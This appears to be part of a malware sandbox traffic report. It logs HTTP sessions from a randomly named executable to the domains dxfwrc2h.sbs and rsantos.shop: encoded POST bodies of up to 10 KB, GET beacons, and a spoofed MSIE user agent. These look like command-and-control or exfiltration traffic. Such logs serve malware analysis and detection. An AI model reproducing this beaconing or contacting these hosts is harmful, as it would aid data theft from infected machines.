                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            42192.168.2.450049129.226.56.200803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:38.195497990 CEST883OUTPOST /170y/ HTTP/1.1
                                                                                                                            Host: www.dxfwrc2h.sbs
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.dxfwrc2h.sbs
                                                                                                                            Referer: http://www.dxfwrc2h.sbs/170y/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 46 31 41 59 36 54 4f 67 51 63 71 66 72 49 64 61 35 32 66 45 56 59 70 51 51 47 62 61 75 4d 72 4e 38 36 31 4d 44 69 7a 58 53 41 77 4c 31 74 42 6c 65 53 61 67 64 52 5a 46 78 64 54 2b 39 4a 33 6c 71 48 4a 4c 58 72 45 31 57 2f 67 69 53 7a 59 79 36 42 37 46 4c 4c 49 50 50 4b 77 57 46 6f 66 4e 6c 49 57 4a 6c 30 35 50 56 6c 76 4e 49 52 66 7a 6a 68 70 48 61 42 64 35 53 67 67 34 38 59 45 39 6a 43 44 33 62 79 42 67 69 35 7a 47 65 31 55 72 4c 4a 4b 79 36 30 75 7a 46 32 33 37 31 48 36 32 50 37 7a 51 6a 47 30 62 41 56 63 52 46 4e 74 43 75 39 6a 36 50 39 69 32 71 36 72 32 74 71 45 36 6e 6e 51 59 4e 43 4c 45 47 6b 69 59 47 65 52 72 7a 57 2b 37 47 37 38 3d
                                                                                                                            Data Ascii: 2BWDG=F1AY6TOgQcqfrIda52fEVYpQQGbauMrN861MDizXSAwL1tBleSagdRZFxdT+9J3lqHJLXrE1W/giSzYy6B7FLLIPPKwWFofNlIWJl05PVlvNIRfzjhpHaBd5Sgg48YE9jCD3byBgi5zGe1UrLJKy60uzF2371H62P7zQjG0bAVcRFNtCu9j6P9i2q6r2tqE6nnQYNCLEGkiYGeRrzW+7G78=
                                                                                                                            Oct 19, 2024 12:59:39.134040117 CEST708INHTTP/1.1 404 Not Found
                                                                                                                            Server: Tengine
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:38 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 548
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            43192.168.2.450050129.226.56.200803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:41.161271095 CEST10965OUTPOST /170y/ HTTP/1.1
                                                                                                                            Host: www.dxfwrc2h.sbs
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.dxfwrc2h.sbs
                                                                                                                            Referer: http://www.dxfwrc2h.sbs/170y/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 46 31 41 59 36 54 4f 67 51 63 71 66 72 49 64 61 35 32 66 45 56 59 70 51 51 47 62 61 75 4d 72 4e 38 36 31 4d 44 69 7a 58 53 41 34 4c 30 66 6c 6c 50 44 61 67 63 52 5a 46 2b 4e 54 37 39 4a 33 30 71 45 35 58 58 72 4a 43 57 39 59 69 51 52 41 79 71 67 37 46 42 4c 49 50 44 71 77 54 4c 49 66 69 6c 49 47 46 6c 33 42 50 56 6c 76 4e 49 53 48 7a 30 6b 46 48 57 68 64 36 43 77 67 30 34 59 45 5a 6a 44 72 6e 62 7a 41 56 33 64 2f 47 66 56 45 72 4f 37 69 79 32 30 75 39 4c 57 32 34 31 47 47 70 50 37 75 70 6a 47 42 2b 41 53 55 52 54 72 68 64 72 2b 6a 71 62 4d 43 5a 30 35 48 49 68 5a 6f 4a 6a 56 67 62 4e 68 76 50 55 56 71 6c 45 74 73 54 6a 57 53 2f 58 2b 6f 68 43 71 30 79 76 79 71 4b 32 30 74 65 48 55 79 7a 61 37 6f 6b 4a 35 31 64 67 4d 58 48 38 53 72 4f 7a 64 71 70 59 6f 76 36 4f 4a 79 66 4c 6e 4c 69 55 38 4b 50 35 6e 64 31 37 4e 30 33 7a 73 5a 2f 39 4f 65 2f 52 56 37 71 58 6e 45 69 73 78 4e 42 44 54 53 72 7a 61 74 65 34 33 4a 67 7a 58 51 43 55 6f 5a 71 75 79 2b 55 44 4a 47 49 6c 50 50 41 55 4e 39 34 [TRUNCATED]
                                                                                                                            Data Ascii: 2BWDG=F1AY6TOgQcqfrIda52fEVYpQQGbauMrN861MDizXSA4L0fllPDagcRZF+NT79J30qE5XXrJCW9YiQRAyqg7FBLIPDqwTLIfilIGFl3BPVlvNISHz0kFHWhd6Cwg04YEZjDrnbzAV3d/GfVErO7iy20u9LW241GGpP7upjGB+ASURTrhdr+jqbMCZ05HIhZoJjVgbNhvPUVqlEtsTjWS/X+ohCq0yvyqK20teHUyza7okJ51dgMXH8SrOzdqpYov6OJyfLnLiU8KP5nd17N03zsZ/9Oe/RV7qXnEisxNBDTSrzate43JgzXQCUoZquy+UDJGIlPPAUN94ZruvQahCpyYbY427e/AEKuETRiKF/HP4eOnpCBKjg9Vyt//Jp2+GdzBgGXPe5PuaKqFTkX1B30XK9BSXWNwoe1ybQOo+q4Si63HOGaSvL/etRAnXTx4jNOfIwja0otsec9MaQzGXZOFByd3sIVkM/CPWKgvlEebWB+u2lROoEaeAgpi5xQAR6qx5f5U74PvfIYlR8I52bBsXPr8zQlI+/TCVUOXBSiHVXaR3C+e6zKaJpeTEVesF2tDERXsS0a/5QIqqnpmgs02fgNWa7Q+bNO/HqNT+S+KlzI/Js0hI8peR/gQ/AalgyVEuo8Sn7TeWd1NvE38gwXlgCQy/wmg2pLnFVzxUyqUStoiIqPqgrz/a3elNxINT0EAAiGE40tKHyw0JASGuU8ofnuxNU6U2ktNo8bcUPJ1sI241cz34+FLOrmOj/vag54UHGXNdSxwfluJht5llzrifqbuTtP1u/LW3FRAp/8Xv11RZCxtJzjzVm9vPzlO6CDvW1KQ9YkQKso0VFSbRza5wHqVyI0vio9PFCxK0lZ2K5DXahYkBEJZykmOIZSmX66Yb31cu1wYsA/AJIh8xHy+OefCcOK/S5O7a0pSK/EimSwj+i13QRgXA9fFcEpnb05zLopdr2wNqb03k7qXd2mGuikJKeHGsEMyDyrqR4xfjMh [TRUNCATED]
                                                                                                                            Oct 19, 2024 12:59:42.105974913 CEST708INHTTP/1.1 404 Not Found
                                                                                                                            Server: Tengine
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:41 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 548
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            44192.168.2.450051129.226.56.200803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:43.702356100 CEST595OUTGET /170y/?2BWDG=I3o45m+IM5HdnoUn9E/KeuZYRn+MuP/J4/ZPHUzUWglV3+hragapbTpjy/fUorb6vXgAJIJIb8kfShtL1xPmTfA4E9gYWbnzpoLcgkFnKSz5IRKj2k5YNRo=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.dxfwrc2h.sbs
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:59:44.676678896 CEST708INHTTP/1.1 404 Not Found
                                                                                                                            Server: Tengine
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:44 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Content-Length: 548
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            45192.168.2.45005284.32.84.32803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:50.297528982 CEST863OUTPOST /314m/ HTTP/1.1
                                                                                                                            Host: www.rsantos.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.rsantos.shop
                                                                                                                            Referer: http://www.rsantos.shop/314m/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 79 6c 73 49 45 71 4d 65 58 57 61 65 35 61 69 59 43 69 52 32 4a 49 6d 4c 51 31 6f 30 46 41 62 70 43 36 69 75 51 33 43 59 6e 31 38 48 6a 53 4f 50 41 50 50 54 32 32 61 76 68 2b 79 78 50 4c 6f 6b 48 31 63 45 42 2f 6a 53 4d 63 4e 51 62 6a 59 64 37 2f 4c 72 46 74 50 64 4a 69 45 56 64 43 36 68 48 77 51 31 79 31 34 58 6c 44 53 2f 73 51 30 57 2b 50 62 37 31 32 52 75 63 74 73 75 46 34 36 49 4c 48 44 32 72 32 4f 79 4b 47 77 61 35 47 44 67 34 46 75 62 46 47 46 2b 70 33 4d 52 6f 4c 35 67 64 79 52 76 71 4e 6b 6f 49 49 73 4d 52 6c 6c 6a 55 41 59 6f 46 50 70 34 54 4f 67 46 31 6e 2b 37 62 77 3d 3d
                                                                                                                            Data Ascii: 2BWDG=ylsIEqMeXWae5aiYCiR2JImLQ1o0FAbpC6iuQ3CYn18HjSOPAPPT22avh+yxPLokH1cEB/jSMcNQbjYd7/LrFtPdJiEVdC6hHwQ1y14XlDS/sQ0W+Pb712RuctsuF46ILHD2r2OyKGwa5GDg4FubFGF+p3MRoL5gdyRvqNkoIIsMRlljUAYoFPp4TOgF1n+7bw==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            46192.168.2.45005384.32.84.32803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:52.883503914 CEST883OUTPOST /314m/ HTTP/1.1
                                                                                                                            Host: www.rsantos.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 222
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.rsantos.shop
                                                                                                                            Referer: http://www.rsantos.shop/314m/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 79 6c 73 49 45 71 4d 65 58 57 61 65 2f 4f 6d 59 4f 68 35 32 64 59 6d 49 4a 46 6f 30 66 77 62 74 43 36 6d 75 51 32 47 49 6e 41 6b 48 69 33 69 50 48 4c 62 54 33 32 61 76 70 65 79 30 41 72 70 4a 48 31 59 4d 42 2b 76 53 4d 63 5a 51 62 69 6f 64 37 6f 2f 73 45 39 50 62 64 53 45 54 54 69 36 68 48 77 51 31 79 30 64 41 6c 43 36 2f 73 68 45 57 2f 72 50 34 2f 57 52 70 62 74 73 75 53 6f 37 44 4c 48 43 56 72 33 6a 58 4b 46 49 61 35 47 7a 67 37 51 53 63 57 6d 46 34 30 6e 4d 43 6a 49 52 72 54 48 34 58 72 4d 59 31 57 4c 63 54 51 6a 30 35 46 78 35 2f 58 50 4e 4c 4f 4a 70 78 34 6b 44 79 41 34 76 68 53 79 49 54 2b 46 6a 76 58 63 52 5a 5a 79 48 36 4c 5a 30 3d
                                                                                                                            Data Ascii: 2BWDG=ylsIEqMeXWae/OmYOh52dYmIJFo0fwbtC6muQ2GInAkHi3iPHLbT32avpey0ArpJH1YMB+vSMcZQbiod7o/sE9PbdSETTi6hHwQ1y0dAlC6/shEW/rP4/WRpbtsuSo7DLHCVr3jXKFIa5Gzg7QScWmF40nMCjIRrTH4XrMY1WLcTQj05Fx5/XPNLOJpx4kDyA4vhSyIT+FjvXcRZZyH6LZ0=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            47192.168.2.45005484.32.84.32803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:55.429565907 CEST10965OUTPOST /314m/ HTTP/1.1
                                                                                                                            Host: www.rsantos.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 10302
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.rsantos.shop
                                                                                                                            Referer: http://www.rsantos.shop/314m/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Data Raw: 32 42 57 44 47 3d 79 6c 73 49 45 71 4d 65 58 57 61 65 2f 4f 6d 59 4f 68 35 32 64 59 6d 49 4a 46 6f 30 66 77 62 74 43 36 6d 75 51 32 47 49 6e 41 73 48 6a 46 71 50 48 70 7a 54 74 32 61 76 32 75 79 31 41 72 70 78 48 78 30 49 42 2b 54 43 4d 59 70 51 61 41 4d 64 76 4d 6a 73 4b 39 50 62 66 53 45 53 64 43 36 34 48 77 42 2b 79 30 4e 41 6c 43 36 2f 73 69 63 57 76 50 62 34 73 47 52 75 63 74 73 63 46 34 36 6b 4c 44 76 75 72 33 58 70 4e 31 6f 61 35 6d 6a 67 2b 6d 47 63 56 47 46 36 33 6e 4e 66 6a 49 4d 7a 54 44 68 75 72 4d 38 50 57 4d 73 54 54 46 78 76 5a 42 78 34 4e 5a 4a 69 61 4a 5a 41 35 6e 58 63 5a 37 66 61 62 44 55 36 6f 78 37 36 55 73 52 52 4d 79 76 6e 58 35 58 75 39 62 48 74 6c 68 55 58 52 6f 79 4d 39 45 6e 53 4a 68 69 38 66 37 32 71 6a 4b 34 56 2f 42 70 37 6e 5a 57 2f 39 75 57 31 49 48 43 4b 4f 58 78 58 53 7a 4a 48 51 2f 4c 69 30 37 37 4d 52 4b 30 63 77 62 6f 4a 30 62 30 71 73 6a 4a 4f 37 5a 38 64 56 6a 44 37 51 5a 39 5a 58 6a 62 30 38 34 42 76 68 62 4b 6a 37 70 76 6e 7a 69 6a 44 35 46 72 57 41 76 76 45 [TRUNCATED]
                                                                                                                            Data Ascii: 2BWDG=ylsIEqMeXWae/OmYOh52dYmIJFo0fwbtC6muQ2GInAsHjFqPHpzTt2av2uy1ArpxHx0IB+TCMYpQaAMdvMjsK9PbfSESdC64HwB+y0NAlC6/sicWvPb4sGRuctscF46kLDvur3XpN1oa5mjg+mGcVGF63nNfjIMzTDhurM8PWMsTTFxvZBx4NZJiaJZA5nXcZ7fabDU6ox76UsRRMyvnX5Xu9bHtlhUXRoyM9EnSJhi8f72qjK4V/Bp7nZW/9uW1IHCKOXxXSzJHQ/Li077MRK0cwboJ0b0qsjJO7Z8dVjD7QZ9ZXjb084BvhbKj7pvnzijD5FrWAvvESVAEtePVbU6GzrooHC0/pbJ4iwCMpWJiCTGzmBNc4EiJw5EZCmvOAaGmSvIZiZZI84aRGf3RagsPqGz53hrVO/5ncY/9MQzf9oGjX8fj1DsYtlW/JFvd0+BqukT6kefcWQ/HBEtUKtzoP4BFn7RupCl0cjDE2lQ9YWTj5rIDt4Ck+pFT4eda3WZ9/k0ZsaJIAA1l0NSFk5Pxhz+9zLSHBn3xfRJ8rUJiz6i9Rvoh6octG3WJxjmAi033oYaY5oU6ayp8xwmnj5Z1kdpCoQXpLZ2ETfd8fkDEpaf6EGm7Skelx+d8QsNCHDRzB7dWPeDoRKmwfXxhNng4TBtjctBcbPeS5GGXhS1Poz9qH7d7egWU60t+q53pL+AKBVoJwevGlCQ1lNrx0N4972g6iYl2FdhIauasYwn3XcmRJ3AE74nsSRb6hZq8/MgsBxkrsw2m3YkF4A7E6XKwzSvW833uNNyo7ABz7n1iHI6+8a/Ky7+8s8pjwiTdjRARXABCw22T5mTX6o/61590N+c/OGC1H3NaYZbj0X2iteo7wj9YMKTZj5g8t3ooMnAyqTvYYYyEqkvgxBDb3KtPHA3v9LWxTVZTEftgxNZSjqooF5ZvxLo+r+fe5LMCfDF7wzYl/M9c0ldxtKUcPuCfbRxYuEiZDJFiPF0STFSyZL [TRUNCATED]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            48192.168.2.45005584.32.84.32803980C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 19, 2024 12:59:57.979615927 CEST595OUTGET /314m/?wfm=G6oTo8vx&2BWDG=/nEoHfYmGWKhq8vFGRFNK+CuQmseJQPwD7+4RgKMnEs9pXqONJL1vWb6ndeJft1RBApaVMH9KNEUZDtJl+3Iba72QDspFCGFBwch41sSsFCGmhRE7+Dvvlc= HTTP/1.1
                                                                                                                            Host: www.rsantos.shop
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                            Oct 19, 2024 12:59:58.617046118 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Server: hcdn
                                                                                                                            Date: Sat, 19 Oct 2024 10:59:58 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 10072
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            alt-svc: h3=":443"; ma=86400
